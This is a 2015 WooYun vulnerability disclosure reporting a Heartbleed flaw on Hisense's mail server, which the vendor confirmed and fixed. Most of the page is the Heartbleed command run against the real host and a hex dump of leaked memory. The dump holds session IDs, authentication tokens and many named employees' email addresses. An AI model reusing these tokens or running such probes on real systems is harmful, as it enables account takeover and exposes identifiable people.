当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2015-0109084
漏洞标题:
海信集团邮件服务器心脏滴血漏洞
相关厂商:
hisense.com
漏洞作者:
小健客
提交时间:
2015-04-20 10:52
修复时间:
2015-06-08 15:10
公开时间:
2015-06-08 15:10
漏洞类型:
系统/服务补丁不及时
危害等级:
自评Rank:
6
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2015-04-20: 细节已通知厂商并且等待厂商处理中
2015-04-24: 厂商已经确认,细节仅向厂商公开
2015-05-04: 细节向核心白帽子及相关领域专家公开
2015-05-14: 细节向普通白帽子公开
2015-05-24: 细节向实习白帽子公开
2015-06-08: 细节向公众公开

简要描述:

心脏滴血漏洞 出来多久了 还不打补丁

详细说明:

java HeartBleed mail.hisense.com 443
泄露了什么信息,嘿嘿,如果我是黑阔会进一步利用

Connected with mail.hisense.com:443
Reading Server Hello. Type: 22, version: 770, length: 66
Reading Server Hello. Type: 22, version: 770, length: 3857
Reading Server Hello. Type: 22, version: 770, length: 331
Reading Server Hello. Type: 22, version: 770, length: 4
Server Hello Done
18 03 02 00 04 01 10 00 2f 							:  /
Heartbeat sent
Reading Server Message. Type: 24, version: 770, length: 4115
Server Heartbeat received. Length: 4115
02 10 00 2f 63 6f 72 65 6d 61 69 6c 2f 58 54 33 : /coremail/XT3
2f 69 6e 64 65 78 2e 6a 73 70 3f 73 69 64 3d 42 :/index.jsp?sid=B
41 58 41 66 79 54 54 4b 61 6d 4c 71 58 46 48 4f :AXAfyTTKamLqXFHO
56 54 54 6e 71 65 53 4f 4a 54 53 50 6f 65 73 20 :VTTnqeSOJTSPoes 
48 54 54 50 2f 31 2e 31 0d 0a 41 63 63 65 70 74 :HTTP/1.1 Accept
3a 20 74 65 78 74 2f 68 74 6d 6c 2c 20 61 70 70 :: text/html, app
6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 :lication/xhtml+x
6d 6c 2c 20 2a 2f 2a 0d 0a 52 65 66 65 72 65 72 :ml, */* Referer
3a 20 68 74 74 70 73 3a 2f 2f 6d 61 69 6c 2e 68 :: https://mail.h
69 73 65 6e 73 65 2e 63 6f 6d 2f 63 6f 72 65 6d :isense.com/corem
61 69 6c 2f 69 6e 64 65 78 2e 6a 73 70 3f 73 69 :ail/index.jsp?si
64 3d 42 41 64 5a 66 79 54 54 53 4a 6d 4c 71 58 :d=BAdZfyTTSJmLqX
59 68 4b 56 54 54 76 42 6c 6b 4f 67 6f 56 6e 7a :YhKVTTvBlkOgoVnz
70 46 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 75 :pF Accept-Langu
61 67 65 3a 20 7a 68 2d 43 4e 0d 0a 55 73 65 72 :age: zh-CN User
2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f :-Agent: Mozilla/
35 2e 30 20 28 63 6f 6d 70 61 74 69 62 6c 65 3b :5.0 (compatible;
20 4d 53 49 45 20 39 2e 30 3b 20 57 69 6e 64 6f : MSIE 9.0; Windo
77 73 20 4e 54 20 36 2e 31 3b 20 54 72 69 64 65 :ws NT 6.1; Tride
6e 74 2f 35 2e 30 29 0d 0a 41 63 63 65 70 74 2d :nt/5.0) Accept-
45 6e 63 6f 64 69 6e 67 3a 20 67 7a 69 70 2c 20 :Encoding: gzip, 
64 65 66 6c 61 74 65 0d 0a 48 6f 73 74 3a 20 6d :deflate Host: m
61 69 6c 2e 68 69 73 65 6e 73 65 2e 63 6f 6d 0d :ail.hisense.com
0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 : Connection: Kee
70 2d 41 6c 69 76 65 0d 0a 43 61 63 68 65 2d 43 :p-Alive Cache-C
6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 :ontrol: no-cache
0d 0a 43 6f 6f 6b 69 65 3a 20 43 6f 72 65 6d 61 : Cookie: Corema
69 6c 2e 49 6e 64 65 78 50 61 67 65 44 61 74 61 :il.IndexPageData
3d 74 73 25 33 44 2d 31 3b 20 43 6f 72 65 6d 61 :=ts%3D-1; Corema
69 6c 3d 37 32 32 65 61 31 62 66 33 62 63 63 32 :il=722ea1bf3bcc2
62 62 33 38 30 38 36 65 39 36 35 63 33 62 62 39 :bb38086e965c3bb9
63 66 38 3b 20 43 6f 72 65 6d 61 69 6c 52 65 66 :cf8; CoremailRef
65 72 65 72 3d 68 74 74 70 73 25 33 41 25 32 46 :erer=https%3A%2F
25 32 46 6d 61 69 6c 2e 68 69 73 65 6e 73 65 2e :%2Fmail.hisense.
63 6f 6d 25 32 46 63 6f 72 65 6d 61 69 6c 25 32 :com%2Fcoremail%2
46 69 6e 64 65 78 2e 6a 73 70 3b 20 43 6f 72 65 :Findex.jsp; Core
6d 61 69 6c 2e 73 69 64 3d 42 41 49 75 66 79 54 :mail.sid=BAIufyT
54 70 71 72 4c 71 58 50 6b 4f 56 54 54 58 4c 6c :TpqrLqXPkOVTTXLl
4c 78 51 6d 4c 58 53 47 73 3b 20 75 69 64 3d 68 :LxQmLXSGs; uid=h
75 61 6e 67 71 69 3b 20 64 6f 6d 61 69 6e 5f 6e :uangqi; domain_n
61 6d 65 3d 68 69 73 65 6e 73 65 2e 63 6f 6d 3b :ame=hisense.com;
20 6c 6f 63 61 6c 65 3d 7a 68 5f 43 4e 3b 20 63 : locale=zh_CN; c
6f 72 65 6d 61 69 6c 5f 75 73 65 72 69 64 3d 68 :oremail_userid=h
75 61 6e 67 71 69 25 34 30 68 69 73 65 6e 73 65 :uangqi%40hisense
2e 63 6f 6d 3b 20 4c 74 70 61 54 6f 6b 65 6e 3d :.com; LtpaToken=
41 41 45 43 41 7a 55 31 4d 7a 4d 35 4d 44 68 42 :AAECAzU1MzM5MDhB
4e 54 55 7a 4e 44 41 78 4d 45 46 6f 64 57 46 75 :NTUzNDAxMEFodWFu
5a 33 46 70 4a 47 63 78 73 4f 63 69 45 69 5a 44 :Z3FpJGcxsOciEiZD
52 53 33 61 49 4b 57 55 38 72 4f 71 64 54 34 3d :RS3aIKWU8rOqdT4=
0d 0a 0d 0a 32 e6 84 44 ac 5f d6 07 9b bd e8 fb :  2?D?_?????
eb 99 44 95 e4 10 24 1b 07 07 07 07 07 07 07 07 :?D??$
ec d8 84 c4 5b 03 58 67 ed 6c 76 2f b0 57 33 76 :???[Xg?lv/?W3v
c8 cc 42 8c 28 e6 b8 b3 d3 4e bb 6e d1 66 81 5a :??B?(渳?N?n?f?Z
f0 30 63 cf 37 0d 0a 0d 0a 8c ee ae 2e 3f c0 85 :?0c?7  ??.???
7c dc 84 2a fc cf 05 70 c3 c1 7e ed 48 02 02 02 :|?*??p??~?H
19 12 74 a4 84 af 09 63 cb 14 ff c4 26 fb ef 3c :t???	c???&??<
0b 29 f0 06 db 45 2f 2c 64 c7 2b fd e0 67 7d 4f :)??E/,d?+??g}O
c0 09 2a 55 5b 64 3d 42 41 4a 41 66 79 54 54 55 :?	*U[d=BAJAfyTTU
61 6d 4c 71 58 62 42 70 56 54 54 63 61 43 72 59 :amLqXbBpVTTcaCrY
6e 64 43 54 74 54 51 0d 0a 0d 0a b4 cb 6f 9a 26 :ndCTtTQ  ??o?&
8e 2b 23 79 4f 48 1b f3 ba 65 87 d1 22 e2 94 00 :?+#yOH?e??"? 
e5 bf 9e 77 74 27 15 9c d0 65 b4 01 0d 90 e2 e0 :忞wt'??e?
???
2f d8 19 70 bb 8b 7a cf 75 15 94 67 77 f7 79 af :/?p??z?u?gw?y?
c4 82 8b 94 ae 4e 2f 3c 1d e7 72 9e 54 f7 5b cc :????N/<?r?T?[?
41 35 bf f1 1a b0 28 3f 4e 93 d5 7f 96 82 2c d5 :A5???(?N????,?
6d df ab 12 59 6e 51 4c 71 58 73 4d 4b 56 54 54 :m?YnQLqXsMKVTT
56 6a 55 63 48 6b 45 49 73 4d 47 73 0d 0a 0d 0a :VjUcHkEIsMGs  
da 40 72 9d 6f dd 55 ed b0 a2 09 e5 26 46 99 f9 :?@r?o?U?	?&F??
ae a1 be 87 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b :????
0c af 1d 55 5b 2b 11 3f 1a fe cb 29 b7 ca dc d4 :?U[+???)????
3c 2c d0 b5 74 ff f9 b3 a9 3e c0 68 29 71 2b 8e :<,еt????>?h)q+?
3d 66 b2 93 f0 69 64 3d 73 70 6a 7a 7a 68 69 6c :=f???id=spjzzhil
69 61 6e 67 25 34 30 68 69 73 65 6e 73 65 2e 63 :iang%40hisense.c
6f 6d 3b 20 4c 74 70 61 54 6f 6b 65 6e 3d 41 41 :om; LtpaToken=AA
45 43 41 7a 55 31 4d 7a 4d 34 4d 7a 6c 43 4e 54 :ECAzU1MzM4MzlCNT
55 7a 4d 30 59 30 4d 55 4a 7a 63 47 70 36 65 6d :UzM0Y0MUJzcGp6em
68 70 62 47 6c 68 62 6d 65 4f 41 76 49 34 50 69 :hpbGlhbmeOAvI4Pi
75 56 66 4e 32 6d 49 4e 38 77 45 33 53 48 41 51 :uVfN2mIN8wE3SHAQ
6e 44 6e 51 3d 3d 0d 0a 0d 0a 30 c4 7a 6c 59 02 :nDnQ==  0?zlY
eb ab 23 92 68 7e 9c b4 a2 4e bb 0c 2c fd 01 01 :?#?h~???N?,?
3f 9c b9 a9 27 bd 40 77 5f 9b 20 57 de bd 65 83 :????'?@w_? W?e?
21 d3 bf bc f3 03 6f 60 0e fa 63 c6 28 32 65 39 :!???o`?c?(2e9
37 37 36 61 61 63 62 62 30 36 36 66 32 65 36 39 :776aacbb066f2e69
36 62 37 38 61 31 31 37 34 38 3b 20 43 6f 72 65 :6b78a11748; Core
6d 61 69 6c 52 65 66 65 72 65 72 3d 68 74 74 70 :mailReferer=http
25 33 41 25 32 46 25 32 46 6d 61 69 6c 2e 68 69 :%3A%2F%2Fmail.hi
73 65 6e 73 65 2e 63 6f 6d 25 32 46 3b 20 4c 74 :sense.com%2F; Lt
70 61 54 6f 6b 65 6e 3d 41 41 45 43 41 7a 55 31 :paToken=AAECAzU1
4d 7a 4d 34 51 55 45 30 4e 54 55 7a 4d 30 5a 43 :MzM4QUE0NTUzM0ZC
4d 6a 52 6f 59 57 35 6a 61 47 46 75 5a 33 4e 6f :MjRoYW5jaGFuZ3No
5a 57 35 6e 4c 38 35 77 32 44 76 30 6a 62 54 46 :ZW5nL85w2Dv0jbTF
71 43 54 75 57 6a 62 5a 38 66 78 70 39 52 55 3d :qCTuWjbZ8fxp9RU=
3b 20 63 6f 72 65 6d 61 69 6c 5f 75 73 65 72 69 :; coremail_useri
64 3d 68 61 6e 63 68 61 6e 67 73 68 65 6e 67 25 :d=hanchangsheng%
34 30 68 69 73 65 6e 73 65 2e 63 6f 6d 3b 20 43 :40hisense.com; C
6f 72 65 6d 61 69 6c 2e 73 69 64 3d 42 41 6d 4c :oremail.sid=BAmL
66 79 54 54 4f 50 51 4c 71 58 76 59 70 56 54 54 :fyTTOPQLqXvYpVTT
49 44 4d 6c 4f 69 4f 6d 53 77 64 73 0d 0a 0d 0a :IDMlOiOmSwds  
7c 60 c7 5d db f9 3a 6b 64 c2 96 1f 9d 58 ff f6 :|`?]??:kd??X??
9d af 03 74 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b 0b :??t
51 77 2b 3f 74 52 80 5f 70 4e fc 5e 81 01 e6 da :Qw+?tR?_pN?^???
7b dc 25 dc 83 4b c1 38 a8 52 10 64 90 32 98 3b :{?%?K?8?Rd?2?;
ac 91 cf 31 82 32 25 45 35 25 38 38 25 39 38 25 :???1?2%E5%88%98%
45 35 25 42 30 25 38 46 25 45 34 25 42 43 25 39 :E5%B0%8F%E4%BC%9
46 25 32 32 2b 25 33 43 6c 69 75 78 69 61 6f 77 :F%22+%3Cliuxiaow
65 69 31 25 34 30 33 63 2e 68 69 73 65 6e 73 65 :ei1%403c.hisense
2e 63 6f 6d 25 33 45 25 32 43 25 32 32 25 45 35 :.com%3E%2C%22%E5
25 42 38 25 41 44 25 45 36 25 39 36 25 38 37 25 :%B8%AD%E6%96%87%
45 36 25 39 36 25 38 43 25 32 32 2b 25 33 43 78 :E6%96%8C%22+%3Cx
69 77 65 6e 62 69 6e 25 34 30 33 63 2e 68 69 73 :iwenbin%403c.his
65 6e 73 65 2e 63 6f 6d 25 33 45 25 32 43 25 32 :ense.com%3E%2C%2
32 25 45 36 25 39 44 25 41 38 25 45 34 25 42 41 :2%E6%9D%A8%E4%BA
25 41 43 25 45 35 25 38 44 25 39 41 25 32 32 2b :%AC%E5%8D%9A%22+
25 33 43 79 61 6e 67 6a 69 6e 67 62 6f 25 34 30 :%3Cyangjingbo%40
33 63 2e 68 69 73 65 6e 73 65 2e 63 6f 6d 25 33 :3c.hisense.com%3
45 25 32 43 25 32 32 25 45 35 25 42 43 25 41 30 :E%2C%22%E5%BC%A0
25 45 37 25 41 33 25 38 41 25 32 38 25 45 38 25 :%E7%A3%8A%28%E8%
38 32 25 41 31 25 45 34 25 42 42 25 42 44 25 45 :82%A1%E4%BB%BD%E
38 25 41 35 25 42 46 25 45 35 25 41 45 25 38 39 :8%A5%BF%E5%AE%89
25 32 39 25 32 32 2b 25 33 43 7a 68 61 6e 67 6c :%29%22+%3Czhangl
65 69 31 30 25 34 30 33 63 2e 68 69 73 65 6e 73 :ei10%403c.hisens
65 2e 63 6f 6d 25 33 45 25 32 43 25 32 32 25 45 :e.com%3E%2C%22%E
35 25 39 31 25 41 38 25 45 36 25 38 43 25 41 46 :5%91%A8%E6%8C%AF
25 45 37 25 41 35 25 41 35 25 32 32 2b 25 33 43 :%E7%A5%A5%22+%3C
7a 68 6f 75 7a 68 65 6e 78 69 61 6e 67 31 25 34 :zhouzhenxiang1%4
30 33 63 2e 68 69 73 65 6e 73 65 2e 63 6f 6d 25 :03c.hisense.com%
33 45 25 32 43 25 32 32 30 36 25 45 38 25 41 35 :3E%2C%2206%E8%A5
25 42 46 25 45 35 25 41 45 25 38 39 25 45 35 25 :%BF%E5%AE%89%E5%
38 41 25 39 45 25 45 34 25 42 41 25 38 42 25 45 :8A%9E%E4%BA%8B%E
35 25 41 34 25 38 34 25 32 32 2b 25 33 43 67 66 :5%A4%84%22+%3Cgf
78 69 61 6e 62 73 63 25 34 30 33 63 2e 68 69 73 :xianbsc%403c.his
65 6e 73 65 2e 63 6f 6d 25 33 45 25 32 43 25 32 :ense.com%3E%2C%2
32 30 37 25 45 39 25 39 33 25 42 36 25 45 35 25 :207%E9%93%B6%E5%
42 37 25 39 44 25 45 35 25 38 41 25 39 45 25 45 :B7%9D%E5%8A%9E%E
34 25 42 41 25 38 42 25 45 35 25 41 34 25 38 34 :4%BA%8B%E5%A4%84
25 32 32 2b 25 33 43 67 66 79 69 6e 63 68 75 61 :%22+%3Cgfyinchua
6e 62 73 63 25 34 30 33 63 2e 68 69 73 65 6e 73 :nbsc%403c.hisens
65 2e 63 6f 6d 25 33 45 25 32 43 25 32 32 30 38 :e.com%3E%2C%2208
25 45 35 25 41 45 25 38 39 25 45 35 25 42 41 25 :%E5%AE%89%E5%BA%
42 37 25 45 35 25 38 41 25 39 45 25 45 34 25 42 :B7%E5%8A%9E%E4%B
41 25 38 42 25 45 35 25 41 34 25 38 34 25 32 32 :A%8B%E5%A4%84%22
2b 25 33 43 67 66 61 6e 6b 61 6e 67 62 73 63 25 :+%3Cgfankangbsc%
34 30 33 63 2e 68 69 73 65 6e 73 65 2e 63 6f 6d :403c.hisense.com
25 33 45 25 32 43 25 32 32 30 39 25 45 35 25 41 :%3E%2C%2209%E5%A
45 25 39 44 25 45 39 25 42 38 25 41 31 25 45 35 :E%9D%E9%B8%A1%E5
25 38 41 25 39 45 25 45 34 25 42 41 25 38 42 25 :%8A%9E%E4%BA%8B%
45 35 25 41 34 25 38 34 25 32 32 2b 25 33 43 67 :E5%A4%84%22+%3Cg
66 62 61 6f 6a 69 62 73 63 25 34 30 33 63 2e 68 :fbaojibsc%403c.h
69 73 65 6e 73 65 2e 63 6f 6d 25 33 45 25 32 43 :isense.com%3E%2C
25 32 32 31 30 25 45 36 25 42 31 25 38 39 25 45 :%2210%E6%B1%89%E
34 25 42 38 25 41 44 25 45 35 25 38 41 25 39 45 :4%B8%AD%E5%8A%9E
25 45 34 25 42 41 25 38 42 25 45 35 25 41 34 25 :%E4%BA%8B%E5%A4%
38 34 25 32 32 2b 25 33 43 67 66 68 61 6e 7a 68 :84%22+%3Cgfhanzh
6f 6e 67 62 73 63 25 34 30 33 63 2e 68 69 73 65 :ongbsc%403c.hise
6e 73 65 2e 63 6f 6d 25 33 45 25 32 43 25 32 32 :nse.com%3E%2C%22
31 31 25 45 35 25 39 35 25 38 36 25 45 36 25 42 :11%E5%95%86%E6%B
34 25 39 42 25 45 35 25 38 41 25 39 45 25 45 34 :4%9B%E5%8A%9E%E4
25 42 41 25 38 42 25 45 35 25 41 34 25 38 34 25 :%BA%8B%E5%A4%84%
32 32 2b 25 33 43 67 66 73 68 61 6e 67 6c 75 6f :22+%3Cgfshangluo
62 73 63 25 34 30 33 63 2e 68 69 73 65 6e 73 65 :bsc%403c.hisense
2e 63 6f 6d 25 33 45 25 32 43 25 32 32 31 32 25 :.com%3E%2C%2212%
45 39 25 39 33 25 39 43 25 45 35 25 42 37 25 39 :E9%93%9C%E5%B7%9
44 25 45 35 25 38 41 25 39 45 25 45 34 25 42 41 :D%E5%8A%9E%E4%BA
25 38 42 25 45 35 25 41 34 25 38 34 25 32 32 2b :%8B%E5%A4%84%22+
25 33 43 67 66 74 6f 6e 67 63 68 75 61 6e 62 73 :%3Cgftongchuanbs
63 25 34 30 33 63 2e 68 69 73 65 6e 73 65 2e 63 :c%403c.hisense.c
6f 6d 25 33 45 25 32 43 25 32 32 31 33 25 45 36 :om%3E%2C%2213%E6
25 42 38 25 41 44 25 45 35 25 38 44 25 39 37 25 :%B8%AD%E5%8D%97%
45 35 25 38 41 25 39 45 25 45 34 25 42 41 25 38 :E5%8A%9E%E4%BA%8
42 25 45 35 25 41 34 25 38 34 25 32 32 2b 25 33 :B%E5%A4%84%22+%3
43 67 66 77 65 69 6e 61 6e 62 73 63 25 34 30 33 :Cgfweinanbsc%403
63 2e 68 69 73 65 6e 73 65 2e 63 6f 6d 25 33 45 :c.hisense.com%3E
25 32 43 25 32 32 31 35 25 45 35 25 39 32 25 42 :%2C%2215%E5%92%B
38 25 45 39 25 39 38 25 42 33 25 45 35 25 38 41 :8%E9%98%B3%E5%8A
25 39 45 25 45 34 25 42 41 25 38 42 25 45 35 25 :%9E%E4%BA%8B%E5%
41 34 25 38 34 25 32 32 2b 25 33 43 67 66 78 69 :A4%84%22+%3Cgfxi
61 6e 79 61 6e 67 62 73 63 25 34 30 33 63 2e 68 :anyangbsc%403c.h
69 73 65 6e 73 65 2e 63 6f 6d 25 33 45 25 32 43 :isense.com%3E%2C
25 32 32 31 36 25 45 36 25 41 36 25 38 36 25 45 :%2216%E6%A6%86%E
36 25 39 45 25 39 37 25 45 35 25 38 41 25 39 45 :6%9E%97%E5%8A%9E
25 45 34 25 42 41 25 38 42 25 45 35 25 41 34 25 :%E4%BA%8B%E5%A4%
38 34 25 32 32 2b 25 33 43 67 66 79 75 6e 6c 69 :84%22+%3Cgfyunli
6e 62 73 63 25 34 30 33 63 2e 68 69 73 65 6e 73 :nbsc%403c.hisens
65 2e 63 6f 6d 25 33 45 25 32 43 25 32 32 31 37 :e.com%3E%2C%2217
25 45 35 25 42 42 25 42 36 25 45 35 25 41 45 25 :%E5%BB%B6%E5%AE%
38 39 25 45 35 25 38 41 25 39 45 25 45 34 25 42 :89%E5%8A%9E%E4%B
41 25 38 42 25 45 35 25 41 34 25 38 34 25 32 32 :A%8B%E5%A4%84%22
2b 25 33 43 67 66 79 61 6e 61 6e 62 73 63 25 34 :+%3Cgfyananbsc%4
30 33 63 2e 68 69 73 65 6e 73 65 2e 63 6f 6d 25 :03c.hisense.com%
33 45 25 32 43 25 32 32 31 39 25 45 38 25 41 35 :3E%2C%2219%E8%A5
25 42 46 25 45 35 25 39 32 25 42 38 25 45 35 25 :%BF%E5%92%B8%E5%
38 41 25 39 45 25 45 34 25 42 41 25 38 42 25 45 :8A%9E%E4%BA%8B%E
35 25 41 34 25 38 34 25 32 32 2b 25 33 43 67 66 :5%A4%84%22+%3Cgf
78 69 78 69 61 6e 31 62 73 63 25 34 30 33 63 2e :xixian1bsc%403c.
68 69 73 65 6e 73 65 2e 63 6f 6d 25 33 45 25 32 :hisense.com%3E%2
43 25 32 32 30 30 25 45 35 25 41 37 25 39 43 25 :C%2200%E5%A7%9C%
45 36 25 42 32 25 42 42 25 45 35 25 38 44 25 38 :E6%B2%BB%E5%8D%8
45 25 32 32 2b 25 33 43 6a 69 61 6e 67 7a 68 69 :E%22+%3Cjiangzhi
68 75 61 25 34 30 33 63 2e 68 69 73 65 6e 73 65 :hua%403c.hisense
2e 63 6f 6d 25 33 45 25 32 43 25 32 32 32 30 25 :.com%3E%2C%2220%
45 39 25 38 32 25 42 35 25 45 37 25 39 30 25 41 :E9%82%B5%E7%90%A
38 25 32 32 2b 25 33 43 73 68 61 6f 6b 75 6e 25 :8%22+%3Cshaokun%
34 30 33 43 2e 68 69 73 65 6e 73 65 2e 63 6f 6d :403C.hisense.com
25 33 45 25 32 43 25 32 32 32 35 25 45 35 25 42 :%3E%2C%2225%E5%B
43 25 41 30 25 45 36 25 42 33 25 41 32 25 32 32 :C%A0%E6%B3%A2%22
2b 25 33 43 7a 68 61 6e 67 62 6f 32 25 34 30 33 :+%3Czhangbo2%403
63 2e 68 69 73 65 6e 73 65 2e 63 6f 6d 25 33 45 :c.hisense.com%3E
25 32 43 25 32 32 25 45 37 25 39 46 25 42 33 25 :%2C%22%E7%9F%B3%
45 37 25 41 33 25 38 41 25 32 32 2b 25 33 43 73 :E7%A3%8A%22+%3Cs
68 69 6c 65 69 38 25 34 30 33 63 2e 68 69 73 65 :hilei8%403c.hise
6e 73 65 2e 63 6f 6d 25 33 45 25 32 43 25 32 32 :nse.com%3E%2C%22
25 45 37 25 42 46 25 39 46 25 45 39 25 41 42 25 :%E7%BF%9F%E9%AB%
39 38 25 45 39 25 41 33 25 39 45 25 32 32 2b 25 :98%E9%A3%9E%22+%
33 43 7a 68 61 69 67 61 6f 66 65 69 25 34 30 33 :3Czhaigaofei%403
63 2e 68 69 73 65 6e 73 65 2e 63 6f 6d 25 33 45 :c.hisense.com%3E
25 32 43 25 32 32 25 45 36 25 41 45 25 42 35 25 :%2C%22%E6%AE%B5%
45 39 25 39 42 25 38 35 25 45 35 25 42 39 25 42 :E9%9B%85%E5%B9%B
33 25 32 32 2b 25 33 43 64 75 61 6e 79 61 70 69 :3%22+%3Cduanyapi
6e 67 25 34 30 33 63 2e 68 69 73 65 6e 73 65 2e :ng%403c.hisense.
63 6f 6d 25 33 45 25 32 43 25 32 32 25 45 39 25 :com%3E%2C%22%E9%
42 42 25 38 34 25 45 34 25 42 46 25 38 41 25 32 :BB%84%E4%BF%8A%2
32 2b 25 33 43 68 75 61 6e 67 6a 75 6e 33 25 34 :2+%3Chuangjun3%4
30 33 63 2e 68 69 73 65 6e 73 65 2e 63 6f 6d 25 :03c.hisense.com%
33 45 25 32 43 25 32 32 25 45 36 25 39 44 25 38 :3E%2C%22%E6%9D%8
45 25 45 35 25 38 30 25 41 39 25 45 39 25 39 42 :E%E5%80%A9%E9%9B
25 41 46 25 32 32 2b 25 33 43 6c 69 71 69 61 6e :%AF%22+%3Cliqian
77 65 6e 25 34 30 33 63 2e 68 69 73 65 6e 73 65 :wen%403c.hisense
2e 63 6f 6d 25 33 45 25 32 43 25 32 32 25 45 35 :.com%3E%2C%22%E5
25 41 44 25 39 46 25 45 37 25 41 35 25 41 35 25 :%AD%9F%E7%A5%A5%
45 34 25 42 41 25 39 31 25 32 32 2b 25 33 43 6d :E4%BA%91%22+%3Cm
65 6e 67 78 69 61 6e 67 79 75 6e 25 34 30 33 63 :engxiangyun%403c
2e 68 69 73 65 6e 73 65 2e 63 6f 6d 25 33 45 25 :.hisense.com%3E%
32 43 25 32 32 25 45 39 25 39 38 25 41 45 25 45 :2C%22%E9%98%AE%E
38 25 38 38 25 41 41 25 32 32 2b 25 33 43 72 75 :8%88%AA%22+%3Cru
61 6e 68 61 6e 67 25 34 30 33 63 2e 68 69 73 65 :anhang%403c.hise
6e 73 65 2e 63 6f 6d 25 33 45 25 32 43 25 32 32 :nse.com%3E%2C%22
25 45 37 25 38 45 25 38 42 25 45 37 25 38 46 25 :%E7%8E%8B%E7%8F%
38 44 25 32 32 2b 25 33 43 77 61 6e 67 7a 68 65 :8D%22+%3Cwangzhe
6e 36 25 34 30 33 63 2e 68 69 73 65 6e 73 65 2e :n6%403c.hisense.
63 6f 6d 25 33 45 25 32 43 25 32 32 25 45 36 25 :com%3E%2C%22%E6%
39 44 25 41 38 25 45 39 25 42 39 25 38 46 25 32 :9D%A8%E9%B9%8F%2
32 2b 25 33 43 79 61 6e 67 70 65 6e 67 33 25 34 :2+%3Cyangpeng3%4
30 33 63 2e 68 69 73 65 6e 73 65 2e 63 6f 6d 25 :03c.hisense.com%
33 45 25 32 43 25 32 32 25 45 39 25 39 32 25 39 :3E%2C%22%E9%92%9
46 25 45 36 25 39 39 25 39 33 25 32 32 2b 25 33 :F%E6%99%93%22+%3
43 7a 68 6f 6e 67 78 69 61 6f 25 34 30 33 63 2e :Czhongxiao%403c.
68 69 73 65 6e 73 65 2e 63 6f 6d 25 33 45 25 32 :hisense.com%3E%2
43 25 32 32 25 45 39 25 39 37 25 41 42 25 45 35 :C%22%E9%97%AB%E5
25 42 42 25 42 41 25 45 35 25 41 45 25 38 31 25 :%BB%BA%E5%AE%81%
32 32 2b 25 33 43 79 61 6e 6a 69 61 6e 6e 69 6e :22+%3Cyanjiannin
67 25 34 30 33 63 2e 68 69 73 65 6e 73 65 2e 63 :g%403c.hisense.c
6f 6d 25 33 45 26 73 65 6e 74 54 49 6e 66 6f 3d :om%3E&sentTInfo=
6d 61 69 6c 25 33 41 4f 43 6b 51 72 41 41 6e 71 :mail%3AOCkQrAAnq
68 47 7a 6a 7a 4e 56 72 57 32 47 41 41 2d 2d 2e :hGzjzNVrW2GAA--.
32 31 32 39 38 57 e7 65 b0 32 64 06 ea 9a 8c c1 :21298W?e?2d??
e4 38 dc cd 12 0e a3 a2 10 14 05 05 05 05 05 05 :?8????
68 6f 6e 11 b4 2d e6 82 42 7b fe 21 51 70 b8 6a :hon?-?B{?!Qp?j
98 7c a3 													:?|?

漏洞证明:

修复方案:

升级 openssl 呗

版权声明:转载请注明来源 小健客@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-04-24 15:09

厂商回复:

感谢您的提醒,我们已经漏洞修复完成。

最新状态:

暂无